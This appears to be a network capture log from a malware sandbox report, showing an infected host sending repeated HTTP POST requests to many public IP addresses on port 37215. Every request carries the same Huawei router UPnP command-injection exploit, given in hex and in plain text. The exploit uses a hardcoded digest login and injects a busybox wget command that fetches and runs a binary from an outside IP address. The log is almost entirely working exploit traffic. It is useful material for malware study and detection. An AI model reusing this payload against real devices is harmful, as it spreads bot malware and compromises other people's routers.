                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2445192.168.2.155269894.50.166.12137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.477310896 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2446192.168.2.1541992222.250.202.16637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.477343082 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2447192.168.2.1549786122.195.192.20337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.477423906 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2448192.168.2.155832837.202.230.19537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.477438927 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2449192.168.2.1554204197.130.121.12837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.477458954 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2450192.168.2.1535398183.46.186.5637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.477474928 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2451192.168.2.1552636186.3.207.437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.477493048 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2452192.168.2.153601441.55.80.14837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.477507114 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2453192.168.2.154857069.15.35.1737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.477525949 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2454192.168.2.155197841.212.9.5137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.477536917 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
